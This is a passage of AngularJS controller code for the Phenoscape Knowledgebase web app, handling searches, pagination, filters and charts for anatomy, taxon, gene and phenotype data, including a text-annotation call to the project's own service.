(taxon) { if (taxon.rank) { return (taxon.rank['@id'] == "http://purl.obolibrary.org/obo/TAXRANK_0000005") || (taxon.rank['@id'] == "http://purl.obolibrary.org/obo/TAXRANK_0000006"); } else { return false; } } }; }) .controller('TermNameController', function ($scope, Label) { $scope.$watch('iri', function (value) { if ($scope.iri) { $scope.term = Label.query({iri: $scope.iri}); } }); }) .controller('CountedPhenotypesForTaxonController', function ($scope, TaxonPhenotypesQuery, OMN) { var params = {total: true}; params.taxon = $scope.taxon['@id']; params.entity = OMN.angled($scope.entity['@id']); params.parts = $scope.parts; params.homologs = $scope.homologs; if ($scope.quality) { params.quality = OMN.angled($scope.quality['@id']); } $scope.count = TaxonPhenotypesQuery.query(params); }) .controller('CountedPresenceOrAbsenceForTaxonController', function ($scope, EntityPresenceEvidence, EntityAbsenceEvidence, OMN) { var params = {total: true, taxon: $scope.taxon['@id'], entity: $scope.entity['@id']}; if ($scope.kind == 'presence') { $scope.count = EntityPresenceEvidence.query(params); } else { $scope.count = EntityAbsenceEvidence.query(params); } }) .controller('CharacterDescriptionAnnotationController', function ($scope, Label, PhenotypeAnnotations, CharacterDescriptionWithAnnotation) { $scope.description = CharacterDescriptionWithAnnotation.query({iri: $scope.iri}); // $scope.phenotype = Label.query({iri: $scope.iri}); $scope.eqs = PhenotypeAnnotations.query({iri: $scope.iri}); }) .controller('ClassificationController', function ($scope, $filter, Classification) { $scope.classification = Classification.query({iri: $scope.iri, definedBy: $scope.definedBy}); $scope.linkMaker = $filter($scope.linkFilter); }) .controller('SimilarityViewController', function ($scope, SimilarityMatches, SimilarityAnnotationMatches, ProfileSize, SimilarityCorpusSize) { $scope.maxSize = 3; $scope.matchesPage = 1; $scope.matchesLimit = 20; $scope.pageChanged = function () { $scope.queryTopMatches(); } $scope.matchesTotal = SimilarityCorpusSize.query({corpus_graph: $scope.corpusGraph}); //FIXME this query is too slow! //$scope.matchesTotal = {total: 1000}; $scope.queryTopMatches = function () { $scope.queryProfileSize = ProfileSize.query({iri: $scope.subject['@id']}); $scope.selectedMatch = null; $scope.topMatches = SimilarityMatches.query({ corpus_graph: $scope.corpusGraph, iri: $scope.subject['@id'], limit: $scope.matchesLimit, offset: ($scope.matchesPage - 1) * $scope.matchesLimit }); }; $scope.selectMatch = function (match) { $scope.selectedMatch = match; $scope.annotationMatches = null; $scope.selectedMatchProfileSize = ProfileSize.query({iri: match.match_profile['@id']}); $scope.annotationMatches = SimilarityAnnotationMatches.query({ corpus_graph: $scope.corpusGraph, query_graph: $scope.queryGraph, query_iri: $scope.subject['@id'], corpus_iri: match.match_profile['@id']} ); }; // $scope.selectedMatch = null; // $scope.annotationMatches = null; // $scope.queryProfileSize = null; // $scope.matchesPage = 1; // $scope.selectedMatchProfileSize = null; $scope.$watch("subject['@id']", function (value) { if (value) { $scope.queryTopMatches(); } }); }) .controller('VisualizationController', function ($scope, $q, TaxaWithPhenotype, OMN) { $scope.$watch('structures', function (newValue, oldValue) { queryNewData(); }); $scope.$watch('values', function (newValue, oldValue) { updateSpec(); }); $scope.structures = [ {'@id': "http://purl.obolibrary.org/obo/UBERON_0003097", label: "dorsal fin"}, {'@id': "http://purl.obolibrary.org/obo/UBERON_4000164", label: "caudal fin"}, {'@id': "http://purl.obolibrary.org/obo/UBERON_2000251", label: "adipose fin"}, {'@id': "http://purl.obolibrary.org/obo/UBERON_4000163", label: "anal fin"} ]; function queryNewData() { var allTaxonCounts = $scope.structures.map(function (item) { return { structure: item, result: TaxaWithPhenotype.query({ entity: OMN.angled(item['@id']), total: true})}; }); var allTaxonCountPromises = allTaxonCounts.map(function (item) { return item.result.$promise; }); $q.all(allTaxonCountPromises).then(function (data) { $scope.values = allTaxonCounts.map(function (item) { return { category: item.structure.label, amount: item.result.total }; }); }); } function updateSpec() { $scope.spec = { "width": 400, "height": 200, "padding": {"top": 10, "left": 50, "bottom": 20, "right": 10}, "data": [ { "name": "table", "values": $scope.values } ], "signals": [ { "name": "tooltip", "init": {}, "streams": [ {"type": "rect:mouseover", "expr": "datum"}, {"type": "rect:mouseout", "expr": "{}"} ] } ], "predicates": [ { "name": "tooltip", "type": "==", "operands": [{"signal": "tooltip._id"}, {"arg": "id"}] } ], "scales": [ { "name": "xscale", "type": "ordinal", "range": "width", "domain": {"data": "table", "field": "category"} }, { "name": "yscale", "range": "height", "nice": true, "domain": {"data": "table", "field": "amount"} } ], "axes": [ { "type": "x", "scale": "xscale" }, { "type": "y", "scale": "yscale" } ], "marks": [ { "type": "rect", "from": {"data":"table"}, "properties": { "enter": { "x": {"scale": "xscale", "field": "category"}, "width": {"scale": "xscale", "band": true, "offset": -1}, "y": {"scale": "yscale", "field": "amount"}, "y2": {"scale": "yscale", "value":0} }, "update": { "fill": {"value": "steelblue"} }, "hover": { "fill": {"value": "red"} } } }, { "type": "text", "properties": { "enter": { "align": {"value": "center"}, "fill": {"value": "#333"} }, "update": { "x": {"scale": "xscale", "signal": "tooltip.category"}, "dx": {"scale": "xscale", "band": true, "mult": 0.5}, "y": {"scale": "yscale", "signal": "tooltip.amount", "offset": -5}, "text": {"signal": "tooltip.amount"}, "fillOpacity": { "rule": [ { "predicate": {"name": "tooltip", "id": {"value": null}}, "value": 0 }, {"value": 1} ] } } } } ] }; } }) ;
js/controllers.js
'use strict'; /* Controllers */ angular.module('pkb.controllers', ['ui.bootstrap']) .controller('AppController', function ($scope, AnatomicalTermSearch, OntologyTermSearch, GeneSearch, Vocab) { $scope.clickLink = function () { $scope.clearSearch(); }; $scope.clearSearch = function () { $scope.searchText = null; $scope.clearResults(); }; $scope.clearResults = function () { $scope.anatomyResults = null; $scope.taxaResults = null; $scope.geneResults = null; }; $scope.performSearches = function () { if ($scope.searchText) { $scope.anatomyResults = AnatomicalTermSearch.query({text: $scope.searchText, limit: 20}); $scope.taxaResults = OntologyTermSearch.query({text: $scope.searchText, limit: 20, definedBy: Vocab.VTO}); $scope.geneResults = GeneSearch.query({text: $scope.searchText, limit: 20}); } }; }) .controller('HomeController', function ($scope, AnatomicalTermSearch, CharacterStateSearch, OntologyTermSearch, GeneSearch, Vocab) { }) .controller('AboutPhenoscapeKBController', function ($scope, AnnotationSummary) { $scope.annotationSummary = AnnotationSummary.query(); }) .controller('AboutPhenoscapeController', function ($scope) { }) .controller('AnnotateTextController', function ($scope, $sce, $http, ScigraphAnnotator) { $scope.data = { testInput: "", inputText: "The caudal skeleton of the catfishes, order Siluriformes. American Museum novitates ; no. 2398\nLundberg, John G.; Baskin, Jonathan N.\n\nTo achieve a better understanding of the evolution of catfishes, comparative studies of single character complexes throughout the entire order is believed to be a rewarding approach. A survey of the caudal skeleton of the Siluriformes reveals 10 basic features which, taken together, distinguish catfishes from other fishes. Of these the most diagnostic are: 1) bases of hypurals 3 and 4 fused with a distinct U[subscript]2 chordacentrum in the young and with a usually reduced second ural centrum in the adults; 2) a secondary hypurapophysis; 3) principal rays of the caudal fin fewer than 10+9, with upper principal rays equal to, or fewer than, the lower rays. Within the Siluriformes four features of the caudal skeleton are found to exhibit group specific patterns of variation and trends from primitive to advanced conditions, and may thus be useful in determining relationships: 1. In the trend from the primitive condition of six separate hypurals to the most advanced condition of complete fusion of caudal elements, various groups have reached different structural levels. In this process the sixth hypural is lost. 2. The trend toward elaboration of the sites of caudal muscle origin (hypurapophysis and secondary hypurapophysis) has involved the formation and elaboration of shelves from originally distinct projections, and a subsequent dorsal shift of these sites. 3. While the most primitive principal caudal fin ray number in siluriforms is 9+9, most groups have 8+9. The trend toward a reduction of principal rays always involves loss of an upper ray before loss of a lower so that upper principal rays are never more numerous than lower ones. 4. A separate U[subscript]2 chordacentrum is present in the young of all Ostariophysi except the Loricariidae, Plotosidae, and probably the Chacidae. In the adults of the majority of catfishes a reduced second ural centrum fused with one or more hypurals lies in the cavity on the posterior face of the compound centrum, PU[subscript]1+ U[subscript]l. In some groups the second ural centrum fuses to the compound centrum. In the Loricariidae and Plotosidae the second ural centrum is fused with PU[subscript]1+U[subscript]l, in early development. A separate, well-developed second ural autocentrum occurs in some members of four specialized and unrelated families. This is interpreted as independent redevelopment of a presumedly primitive pre-ostariophysan condition. The advanced conditions of each of these four features of the caudal skeleton tend to occur together in forms which are also regarded as advanced in most other parts of their anatomy. The primitive character states of these features tend to be retained together in a number of families, i.e. Diplomystidae, Ictaluridae, Bagridae, Cranoglanididae, Schilbeidae, Pangasiidae, and Cetopsidae. Advanced features in the caudal skeleton indicate a relationship between the Clariidae and Heteropneustidae, the Doradidae and Auchenipteridae, the Loricariidae, Astroblepidae, and Callichthyidae, and the Plotosidae and Chacidae. The siluriform caudal skeleton shares many features with that of the cypriniforms but it is consistently more advanced. The ostariophysan caudal skeleton is similar to that of the clupeoids, but it resembles the caudal skeleton of the Gonorynchiformes more closely than that of any other group.", annotatedText: "", longestOnly: false } $scope.tabs = { input: {active: true}, output: {active: false} } $scope.runQuery = function (inputText) { $scope.data.annotatedText = ""; $scope.tabs.output.active = true; $scope.annotationPromise = $http.get('http://kb.phenoscape.org/scigraph/annotations', {params: {content: $scope.data.inputText, longestOnly: $scope.data.longestOnly}}).then(function (response) { var text = response.data; $scope.data.annotatedText = text; } ); }; }) .controller('EntityController', function ($scope, $routeParams, $location, $window, Term, TaxaWithPhenotype, EntityPresence, EntityAbsence, EntityPhenotypeGenes, EntityExpressionGenes, OntologyTermSearch, Vocab, OMN, TaxonPhenotypesQuery, Label, APIroot) { $scope.termID = $routeParams.term; $scope.term = Term.query({'iri': $scope.termID}); $scope.tabs = { properties: {active: true}, taxa: {active: false}, genes: {active: false}, } $scope.taxaTabs = { phenotypes: {active: true}, presence: {active: false}, absence: {active: false} } $scope.genesTabs = { phenotypes: {active: true}, expression: {active: false} } $scope.activateTab = function (tabname) { if (_.has($scope.tabs, tabname)) { $scope.tabs[tabname].active = true; $location.search('tab', tabname); } } $scope.activateTaxaTab = function (tabname) { if (_.has($scope.taxaTabs, tabname)) { $scope.taxaTabs[tabname].active = true; $location.search('taxatab', tabname); } } $scope.activateGenesTab = function (tabname) { if (_.has($scope.genesTabs, tabname)) { $scope.genesTabs[tabname].active = true; $location.search('genestab', tabname); } } // $scope.$on('$routeUpdate', function() { // $scope.activateTab($location.search().tab); // $scope.activateTaxaTab($location.search().taxatab); // $scope.activateGenesTab($location.search().genestab); // }); if ($routeParams.tab && _.has($scope.tabs, $routeParams.tab)) { $scope.tabs[$routeParams.tab].active = true; } if ($routeParams.taxatab && _.has($scope.taxaTabs, $routeParams.taxatab)) { $scope.taxaTabs[$routeParams.taxatab].active = true; } if ($routeParams.genestab && _.has($scope.genesTabs, $routeParams.genestab)) { $scope.genesTabs[$routeParams.genestab].active = true; } $scope.autocompleteTaxa = function (text) { return OntologyTermSearch.query({ limit: 20, text: text, definedBy: Vocab.VTO }).$promise.then(function (response) { return response.results; }); }; $scope.autocompleteQuality = function (text) { return OntologyTermSearch.query({ limit: 20, text: text, definedBy: Vocab.PATO }).$promise.then(function (response) { return response.results; }); }; $scope.filters = { phenotypesTaxonFilter: null, phenotypesQualityFilter: null, phenotypesTaxaIncludeParts: false, phenotypesTaxaIncludeHomologs: false }; if ($routeParams['filters.phenotypesTaxonFilter']) { Label.query({'iri': $routeParams['filters.phenotypesTaxonFilter']}).$promise.then(function (response) { $scope.filters.phenotypesTaxonFilter = response; }); } if ($routeParams['filters.phenotypesQualityFilter']) { Label.query({'iri': $routeParams['filters.phenotypesQualityFilter']}).$promise.then(function (response) { $scope.filters.phenotypesQualityFilter = response; }); } if ($routeParams['filters.phenotypesTaxaIncludeParts']) { $scope.filters.phenotypesTaxaIncludeParts = "true" === $routeParams['filters.phenotypesTaxaIncludeParts']; } if ($routeParams['filters.phenotypesTaxaIncludeHomologs']) { $scope.filters.phenotypesTaxaIncludeHomologs = "true" === $routeParams['filters.phenotypesTaxaIncludeHomologs']; } $scope.taxaWithPhenotypesPage = 1; $scope.taxaWithPhenotypesMaxSize = 3; $scope.taxaWithPhenotypesLimit = 20; $scope.taxaWithPhenotypesPageChanged = function (newPage) { $scope.taxaWithPhenotypesPage = newPage; var params = { entity: OMN.angled($scope.termID), parts: $scope.filters.phenotypesTaxaIncludeParts, homologs: $scope.filters.phenotypesTaxaIncludeHomologs, limit: $scope.taxaWithPhenotypesLimit, offset: ($scope.taxaWithPhenotypesPage - 1) * $scope.taxaWithPhenotypesLimit }; if ($scope.filters.phenotypesTaxonFilter) { params.in_taxon = $scope.filters.phenotypesTaxonFilter['@id']; } if ($scope.filters.phenotypesQualityFilter) { params.quality = OMN.angled($scope.filters.phenotypesQualityFilter['@id']); } $scope.taxaWithPhenotypes = TaxaWithPhenotype.query(params); }; $scope.resetTaxaWithPhenotypes = function() { var params = { entity: OMN.angled($scope.termID), parts: $scope.filters.phenotypesTaxaIncludeParts, homologs: $scope.filters.phenotypesTaxaIncludeHomologs, total: true}; if ($scope.filters.phenotypesTaxonFilter) { params.in_taxon = $scope.filters.phenotypesTaxonFilter['@id']; } if ($scope.filters.phenotypesQualityFilter) { params.quality = OMN.angled($scope.filters.phenotypesQualityFilter['@id']); } $scope.taxaWithPhenotypesTotal = TaxaWithPhenotype.query(params); $scope.taxaWithPhenotypesPageChanged(1); }; $scope.$watchGroup(['filters.phenotypesTaxonFilter', 'filters.phenotypesQualityFilter', 'filters.phenotypesTaxaIncludeParts', 'filters.phenotypesTaxaIncludeHomologs'], function (newValues, oldValues) { updateTaxaWithPhenotypeDownload(); $scope.resetTaxaWithPhenotypes(); }); $scope.$watch('filters.phenotypesTaxonFilter', function (value) { if ($scope.filters.phenotypesTaxonFilter) { $location.search('filters.phenotypesTaxonFilter', $scope.filters.phenotypesTaxonFilter['@id']); } else { $location.search('filters.phenotypesTaxonFilter', null); } }); $scope.$watch('filters.phenotypesQualityFilter', function (value) { if ($scope.filters.phenotypesQualityFilter) { $location.search('filters.phenotypesQualityFilter', $scope.filters.phenotypesQualityFilter['@id']); } else { $location.search('filters.phenotypesQualityFilter', null); } }); $scope.$watch('filters.phenotypesTaxaIncludeParts', function (value) { if ($scope.filters.phenotypesTaxaIncludeParts) { $location.search('filters.phenotypesTaxaIncludeParts', $scope.filters.phenotypesTaxaIncludeParts ? "true" : "false"); } else { $location.search('filters.phenotypesTaxaIncludeParts', null); } }); $scope.$watch('filters.phenotypesTaxaIncludeHomologs', function (value) { if ($scope.filters.phenotypesTaxaIncludeHomologs) { $location.search('filters.phenotypesTaxaIncludeHomologs', $scope.filters.phenotypesTaxaIncludeHomologs ? "true" : "false"); } else { $location.search('filters.phenotypesTaxaIncludeHomologs', null); } }); function updateTaxaWithPhenotypeDownload() { var url = APIroot + "/taxon/with_phenotype?"; var urlParams = ["limit=0"]; urlParams.push("entity=" + $window.encodeURIComponent(OMN.angled($scope.termID))); if ($scope.filters.phenotypesQualityFilter) { urlParams.push("quality=" + $window.encodeURIComponent(OMN.angled($scope.filters.phenotypesQualityFilter['@id']))); } if ($scope.filters.phenotypesTaxonFilter) { urlParams.push("in_taxon=" + $window.encodeURIComponent($scope.filters.phenotypesTaxonFilter['@id'])); } if ($scope.filters.phenotypesTaxaIncludeParts) { urlParams.push("parts=" + $scope.filters.phenotypesTaxaIncludeParts) } if ($scope.filters.phenotypesTaxaIncludeHomologs) { urlParams.push("homologs=" + $scope.filters.phenotypesTaxaIncludeHomologs) } $scope.linkToTaxaWithPhenotypeDownload = url + urlParams.join("&"); } $scope.filters.presenceTaxonFilter = null; $scope.taxaWithPresencePage = 1; $scope.taxaWithPresenceMaxSize = 3; $scope.taxaWithPresenceLimit = 20; $scope.taxaWithPresencePageChanged = function (newPage) { $scope.taxaWithPresencePage = newPage; var params = {entity: $scope.termID, limit: $scope.taxaWithPresenceLimit, offset: ($scope.taxaWithPresencePage - 1) * $scope.taxaWithPresenceLimit}; if ($scope.filters.presenceTaxonFilter) { params.in_taxon = $scope.filters.presenceTaxonFilter['@id']; } $scope.taxaWithPresence = EntityPresence.query(params); }; $scope.resetTaxaWithPresence = function() { var params = {entity: $scope.termID, total: true}; if ($scope.filters.presenceTaxonFilter) { params.in_taxon = $scope.filters.presenceTaxonFilter['@id']; } $scope.taxaWithPresenceTotal = EntityPresence.query(params); $scope.taxaWithPresencePageChanged(1); }; $scope.$watch('filters.presenceTaxonFilter', function (value) { $scope.resetTaxaWithPresence(); }); $scope.taxaWithAbsencePage = 1; $scope.taxaWithAbsenceMaxSize = 3; $scope.taxaWithAbsenceLimit = 20; $scope.taxaWithAbsencePageChanged = function (newPage) { $scope.taxaWithAbsencePage = newPage; var params = {entity: $scope.termID, limit: $scope.taxaWithAbsenceLimit, offset: ($scope.taxaWithPresencePage - 1) * $scope.taxaWithAbsenceLimit}; if ($scope.filters.absenceTaxonFilter) { params.in_taxon = $scope.filters.absenceTaxonFilter['@id']; } $scope.taxaWithAbsence = EntityAbsence.query(params); }; $scope.resetTaxaWithAbsence = function() { var params = {entity: $scope.termID, total: true}; if ($scope.filters.absenceTaxonFilter) { params.in_taxon = $scope.filters.absenceTaxonFilter['@id']; } $scope.taxaWithAbsenceTotal = EntityAbsence.query(params); $scope.taxaWithAbsencePageChanged(1); }; $scope.$watch('filters.absenceTaxonFilter', function (value) { $scope.resetTaxaWithAbsence(); }); $scope.phenotypeGenesPage = 1; $scope.phenotypeGenesMaxSize = 3; $scope.phenotypeGenesLimit = 20; $scope.phenotypeGenesSettings = {}; $scope.phenotypeGenesSettings.includeParts = false; $scope.phenotypeGenesSettings.includeHomologs = false; $scope.phenotypeGenesPageChanged = function (newPage) { $scope.phenotypeGenesPage = newPage; $scope.phenotypeGenes = EntityPhenotypeGenes.query( { iri: $scope.termID, limit: $scope.phenotypeGenesLimit, offset: ($scope.phenotypeGenesPage - 1) * $scope.phenotypeGenesLimit, parts: $scope.phenotypeGenesSettings.includeParts, homologs: $scope.phenotypeGenesSettings.includeHomologs }); }; $scope.resetPhenotypeGenes = function() { $scope.phenotypeGenesTotal = EntityPhenotypeGenes.query( { iri: $scope.termID, total: true, parts: $scope.phenotypeGenesSettings.includeParts, homologs: $scope.phenotypeGenesSettings.includeHomologs }); $scope.phenotypeGenesPageChanged(1); }; $scope.expressionGenesPage = 1; $scope.expressionGenesMaxSize = 3; $scope.expressionGenesLimit = 20; $scope.expressionGenesPageChanged = function (newPage) { $scope.expressionGenesPage = newPage; $scope.expressionGenes = EntityExpressionGenes.query({iri: $scope.termID, limit: $scope.expressionGenesLimit, offset: ($scope.expressionGenesPage - 1) * $scope.expressionGenesLimit}); }; $scope.resetExpressionGenes = function() { $scope.expressionGenesTotal = EntityExpressionGenes.query({iri: $scope.termID, total: true}); $scope.expressionGenesPageChanged(1); }; $scope.resetTaxaWithPresence(); $scope.resetTaxaWithAbsence(); $scope.resetPhenotypeGenes(); $scope.resetExpressionGenes(); }) .controller('TaxonController', function ($scope, $routeParams, $location, $log, $window, Taxon, TaxonPhenotypesQuery, VariationProfileQuery, EntityPresenceEvidence, EntityAbsenceEvidence, OntologyTermSearch, OMN, Vocab, Label, APIroot) { $scope.taxonID = $routeParams.taxon; $scope.taxon = Taxon.query({'iri': $scope.taxonID}); $scope.filters = { phenotypesEntityFilter: null, phenotypesQualityFilter: null, quality_type: null, phenotypesEntityIncludeParts: false, phenotypesEntityIncludeHomologs: false }; if ($routeParams['phenotypes.entity']) { Label.query({'iri': $routeParams['phenotypes.entity']}).$promise.then(function (response) { $scope.filters.phenotypesEntityFilter = response; }); } if ($routeParams['phenotypes.quality_type']) { $scope.filters.quality_type = $routeParams['phenotypes.quality_type'] } else { $scope.filters.quality_type = "quality-phenotype"; } if ($routeParams['phenotypes.quality']) { Label.query({'iri': $routeParams['phenotypes.quality']}).$promise.then(function (response) { $scope.filters.phenotypesQualityFilter = response; }); } if ($routeParams['phenotypes.entity_parts']) { $scope.filters.phenotypesEntityIncludeParts = "true" === $routeParams['phenotypes.entity_parts']; } if ($routeParams['phenotypes.entity_homologs']) { $scope.filters.phenotypesEntityIncludeHomologs = "true" === $routeParams['phenotypes.entity_homologs']; } $scope.autocompleteEntity = function (text) { return OntologyTermSearch.query({ limit: 20, text: text, definedBy: Vocab.Uberon }).$promise.then(function (response) { return response.results; }); }; $scope.autocompleteQuality = function (text) { return OntologyTermSearch.query({ limit: 20, text: text, definedBy: Vocab.PATO }).$promise.then(function (response) { return response.results; }); }; $scope.phenotypeProfilePage = 1; $scope.phenotypeProfileLimit = 20; $scope.phenotypeProfileMaxSize = 3; $scope.phenotypeProfilePageChanged = function (newPage) { $scope.phenotypeProfilePage = newPage; var params = { taxon: $scope.taxonID, parts: $scope.filters.phenotypesEntityIncludeParts, homologs: $scope.filters.phenotypesEntityIncludeHomologs, limit: $scope.phenotypeProfileLimit, offset: ($scope.phenotypeProfilePage - 1) * $scope.phenotypeProfileLimit }; if ($scope.filters.quality_type == 'quality-phenotype') { if ($scope.filters.phenotypesEntityFilter) { params.entity = OMN.angled($scope.filters.phenotypesEntityFilter['@id']); } if ($scope.filters.phenotypesQualityFilter) { params.quality = OMN.angled($scope.filters.phenotypesQualityFilter['@id']); } $scope.phenotypeProfile = TaxonPhenotypesQuery.query(params); } else { var service = null; if ($scope.filters.quality_type == 'entailing-presence') { service = EntityPresenceEvidence; } else { service = EntityAbsenceEvidence; } if ($scope.filters.phenotypesEntityFilter) { params.entity = $scope.filters.phenotypesEntityFilter['@id']; $scope.phenotypeProfile = service.query(params); } else { $scope.phenotypeProfile = null; } } }; $scope.resetPhenotypeProfile = function () { var params = { taxon: $scope.taxonID, parts: $scope.filters.phenotypesEntityIncludeParts, homologs: $scope.filters.phenotypesEntityIncludeHomologs, total: true}; if ($scope.filters.quality_type == 'quality-phenotype') { if ($scope.filters.phenotypesEntityFilter) { params.entity = OMN.angled($scope.filters.phenotypesEntityFilter['@id']); } if ($scope.filters.phenotypesQualityFilter) { params.quality = OMN.angled($scope.filters.phenotypesQualityFilter['@id']); } $scope.phenotypeProfileTotal = TaxonPhenotypesQuery.query(params); var url = APIroot + "/taxon/phenotypes?"; var urlParams = ["limit=0"]; urlParams.push("parts=" + params.parts); if (params.entity) { urlParams.push("entity=" + $window.encodeURIComponent(params.entity)); } if (params.quality) { urlParams.push("quality=" + $window.encodeURIComponent(params.quality)); } urlParams.push("taxon=" + $window.encodeURIComponent(params.taxon)); $scope.linkToTaxonPhenotypeProfileDownload = url + urlParams.join("&"); } else { var service = null; var url = null; if ($scope.filters.quality_type == 'entailing-presence') { service = EntityPresenceEvidence; url = APIroot + "/entity/presence/evidence?"; } else { service = EntityAbsenceEvidence; url = APIroot + "/entity/absence/evidence?"; } if ($scope.filters.phenotypesEntityFilter) { params.entity = $scope.filters.phenotypesEntityFilter['@id']; $scope.phenotypeProfileTotal = service.query(params); var urlParams = ["limit=0"]; urlParams.push("taxon=" + $window.encodeURIComponent(params.taxon)); urlParams.push("entity=" + $window.encodeURIComponent(params.entity)); $scope.linkToTaxonPhenotypeProfileDownload = url + urlParams.join("&"); } else { $scope.phenotypeProfileTotal = null; $scope.linkToTaxonPhenotypeProfileDownload = null; } } $scope.phenotypeProfilePageChanged(1); } $scope.resetPhenotypeProfile(); $scope.$watchGroup(['filters.phenotypesEntityFilter', 'filters.phenotypesQualityFilter', 'filters.quality_type', 'filters.phenotypesEntityIncludeParts', 'filters.phenotypesEntityIncludeHomologs'], function (value) { $scope.resetPhenotypeProfile(); }); $scope.$watch('filters.phenotypesEntityFilter', function (value) { if ($scope.filters.phenotypesEntityFilter) { $location.search('phenotypes.entity', $scope.filters.phenotypesEntityFilter['@id']); } else { $location.search('phenotypes.entity', null); } }); $scope.$watch('filters.phenotypesQualityFilter', function (value) { if ($scope.filters.phenotypesQualityFilter) { $location.search('phenotypes.quality', $scope.filters.phenotypesQualityFilter['@id']); } else { $location.search('phenotypes.quality', null); } }); $scope.$watch('filters.quality_type', function (value) { $location.search('phenotypes.quality_type', $scope.filters.quality_type); }); $scope.$watch('filters.phenotypesEntityIncludeParts', function (value) { $location.search('phenotypes.entity_parts', $scope.filters.phenotypesEntityIncludeParts ? "true" : "false"); }); $scope.$watch('filters.phenotypesEntityIncludeHomologs', function (value) { $location.search('phenotypes.entity_homologs', $scope.filters.phenotypesEntityIncludeHomologs ? "true" : "false"); }); $scope.variationProfilePage = 1; $scope.variationProfileLimit = 20; $scope.variationProfileMaxSize = 3; $scope.variationProfileTotal = VariationProfileQuery.query({taxon: $scope.taxonID, total: true}); $scope.variationProfilePageChanged = function (newPage) { $scope.variationProfilePage = newPage; $scope.variationProfile = VariationProfileQuery.query({taxon: $scope.taxonID, limit: $scope.variationProfileLimit, offset: ($scope.variationProfilePage - 1) * $scope.variationProfileLimit}); }; $scope.variationProfilePageChanged(1); $scope.tabs = { properties: {active: true}, phenotypes: {active: false}, variation: {active: false}, similarity: {active: false} } $scope.activateTab = function (tabname) { if (_.has($scope.tabs, tabname)) { $scope.tabs[tabname].active = true; $location.search('tab', tabname); } } $scope.$on('$routeUpdate', function() { $scope.activateTab($location.search().tab); }); if ($routeParams.tab && _.has($scope.tabs, $routeParams.tab)) { $scope.tabs[$routeParams.tab].active = true; } }) .controller('StudyController', function ($scope, $routeParams, $location, $log, $window, Study, StudyTaxa, StudyPhenotypes, Vocab, Label) { $scope.studyID = $routeParams.study; $scope.study = Study.query({'iri': $scope.studyID}); $scope.phenotypesPage = 1; $scope.phenotypesLimit = 20; $scope.phenotypesMaxSize = 3; $scope.phenotypesPageChanged = function (newPage) { $scope.phenotypesPage = newPage; var params = { iri: $scope.studyID, limit: $scope.phenotypesLimit, offset: ($scope.phenotypesPage - 1) * $scope.phenotypesLimit }; $scope.phenotypes = StudyPhenotypes.query(params); }; $scope.resetPhenotypes = function () { var params = {iri: $scope.studyID, total: true}; $scope.phenotypesTotal = StudyPhenotypes.query(params); $scope.phenotypesPageChanged(1); } $scope.resetPhenotypes(); $scope.taxaPage = 1; $scope.taxaLimit = 20; $scope.taxaMaxSize = 3; $scope.taxaPageChanged = function (newPage) { $scope.taxaPage = newPage; var params = { iri: $scope.studyID, limit: $scope.taxaLimit, offset: ($scope.taxaPage - 1) * $scope.taxaLimit }; $scope.taxa = StudyTaxa.query(params); }; $scope.resetTaxa = function () { var params = {iri: $scope.studyID, total: true}; $scope.taxaTotal = StudyTaxa.query(params); $scope.taxaPageChanged(1); } $scope.resetTaxa(); }) .controller('GeneController', function ($scope, $routeParams, $location, Gene, GenePhenotypes, GeneExpression) { $scope.geneID = $routeParams.gene; $scope.gene = Gene.query({iri: $scope.geneID}); $scope.queryPhenotypes = function () { $scope.phenotypes = GenePhenotypes.query({iri: $scope.geneID}); } $scope.queryExpression = function () { $scope.expression = GeneExpression.query({iri: $scope.geneID}); } $scope.queryPhenotypes(); $scope.queryExpression(); $scope.tabs = { phenotypes: {active: true}, expression: {active: false}, similarity: {active: false} } $scope.activateTab = function (tabname) { if (_.has($scope.tabs, tabname)) { $scope.tabs[tabname].active = true; $location.search('tab', tabname); } } $scope.$on('$routeUpdate', function() { $scope.activateTab($location.search().tab); }); if ($routeParams.tab && _.has($scope.tabs, $routeParams.tab)) { $scope.tabs[$routeParams.tab].active = true; } }) .controller('CharacterStateController', function ($scope, $routeParams, Label) { $scope.stateID = $routeParams.state; $scope.termLabel = Label.query({'iri': $scope.stateID}); }) .controller('ContentsController', function ($scope) { }) .controller('PresenceAbsenceController', function ($scope, EntityPresence) { $scope.presenceStates = []; $scope.queryPresence = function () { if ($scope.taxon && $scope.entity) { $scope.presenceStates = EntityPresence.query({'taxon': $scope.taxon, 'entity': $scope.entity}); } else { $scope.presenceStates = []; } }; }) .controller('QueryCharacterStatesController', function ($scope, CharacterStateQuery, Vocab, OMN) { $scope.queryPanelOptions = { includeTaxonGroup: true, includeEntity: true }; $scope.queryParams = { taxa: [], entities: [], expressionEntities: [], matchAllEntities: false, }; $scope.maxSize = 5; $scope.itemsPage = 1; $scope.itemsLimit = 20; $scope.pageChanged = function () { $scope.queryCharacterStates(); } function webServiceParams(queryParams) { var result = {}; var taxa = queryParams.taxa.map(function (item) { return OMN.angled(item['@id']); }); if (taxa.length > 0) { if (queryParams.matchAllTaxa) { result.taxon = OMN.intersection(taxa); } else { result.taxon = OMN.union(taxa); } } var entities = queryParams.entities.map(function (item) { return OMN.angled(item['@id']); }); if (entities.length > 0) { if (queryParams.matchAllEntities) { result.entity = OMN.intersection(entities); } else { result.entity = OMN.union(entities); } } return result; } $scope.queryCharacterStates = function () { $scope.statesResults = CharacterStateQuery.query(_.extend({ limit: $scope.itemsLimit, offset: ($scope.itemsPage - 1) * $scope.itemsLimit }, webServiceParams($scope.queryParams))); }; $scope.queryTotal = function () { $scope.itemsTotal = CharacterStateQuery.query(_.extend({total: true}, webServiceParams($scope.queryParams))); }; $scope.applyQueryFilter = function() { $scope.itemsPage = 1; $scope.queryCharacterStates(); $scope.queryTotal(); } $scope.queryCharacterStates(); $scope.queryTotal(); }) .controller('QueryVariationProfileController', function ($scope, $routeParams, VariationProfileQuery, Vocab, OMN, Label) { $scope.queryPanelOptions = { includeTaxonGroup: true, includeEntity: false }; // $scope.queryParams = { // taxa: [], // entities: [], // expressionEntities: [], // matchAllEntities: false, // }; $scope.maxSize = 5; $scope.itemsPage = 1; $scope.itemsLimit = 20; $scope.pageChanged = function () { $scope.queryVariationProfile(); } function webServiceParams(queryParams) { var result = {}; var taxa = queryParams.taxa.map(function (item) { return item['@id']; }); if (taxa.length > 0) { result.taxon = angular.toJson(taxa); } var entities = queryParams.entities.map(function (item) { return OMN.angled(item['@id']); }); if (entities.length > 0) { if (queryParams.matchAllEntities) { result.entity = OMN.intersection(entities); } else { result.entity = OMN.union(entities); } } return result; } $scope.queryVariationProfile = function () { $scope.profileResults = VariationProfileQuery.query(_.extend({ limit: 